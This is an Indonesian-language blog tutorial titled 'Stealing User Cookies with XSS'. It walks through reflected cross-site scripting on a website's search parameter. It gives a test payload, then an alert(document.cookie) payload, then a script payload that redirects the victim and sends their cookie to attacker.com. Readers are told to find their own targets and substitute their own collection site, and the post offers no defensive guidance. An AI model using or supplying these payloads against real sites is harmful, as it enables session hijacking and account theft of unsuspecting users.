skip to main | skip to sidebar

Mencuri Cookie Pengguna dengan XSS

Cookie yang dibahas disini bukan kue. Cookie adalah sebuah informasi yang digunakan website untuk menyimpan informasi data pengguna. Data login tersebut difungsikan akan jika pengguna ingin membuka website tersebut tidak perlu login lagi.


Kita dapat mencuri cookie dari pengguna dengan menggunakan tehnik XSS atau Cross Site Scripting. Cross Site Scripting sama seperti SQLi yaitu berupa injeksi kode, tetapi untuk XSS menggunakan kode HTML dan Javascript. Kerentanan terhadap XSS terbanyak pada fitur pencarian yang ada di website.

Syarat :
1) Memahami HTML
2) Memahami Javascript

XSS sendiri terbagi menjadi 2 yaitu :
1) Reflected XSS, payload berada pada parameter url.
2) Stored XSS, payload disimpan di database.

Untuk contoh targetnya kalian bisa cari sendiri, saya menggunakan server lokal. Saya akan mencontohkan untuk men-eksploitasi pada fitur pencarian. Biasa ketika kita mencari sesuatu maka url akan berubah dan membawa parameter tertentu.


Dari gambar diatas dapat dilihat kalau nilai dari parameter "j" ( pada URL ) mempunyai nilai berita dan nilai tersebut ter-reflected ke dalam sebuah tag html dan kolom input. Kita masukan payload untuk mengecek kerentanan website.

Payload : "><img src=x>
URL : .../xss_1.php?j="><img src=x>

Jika website menampilkan gambar dengan icon rusak, berarti website tersebut rentan terhadap XSS. Setelah itu kita coba untuk menampilkan cookie user dengan fungsi javascript alert() dan document.cookie.


Payload : "><img src=x onerror="javascript:alert(document.cookie)">
URL : .../xss_1.php?j="><img src=x onerror="javascript:alert(document.cookie)">

Contoh cookie yang ditampilkan di website seperti ini :


Setelah itu kita buat payload untuk menyimpan cookie ( yang didapatkan ) ke website kita sendiri. Kita gunakan tag script untuk menjalankan kode javascript dengan mudah.

Payload : "><script>window.location='http://attacker.com%3fparam='%2bencodeURI( document.cookie )</script>

Ganti website attacker dan parameternya dengan kepunyaan kalian sendiri. Kalau url-nya dikunjungi, akan langsung dialihkan ke halaman attacker.


Oke, segitu saja untuk kali ini. Untuk yang stored XSS secara tehnik sama saja. Tulis dikolom komentar jika kalian belum paham dan sampai jumpa pada tutorial berikutnya.

0 komentar:

Post a Comment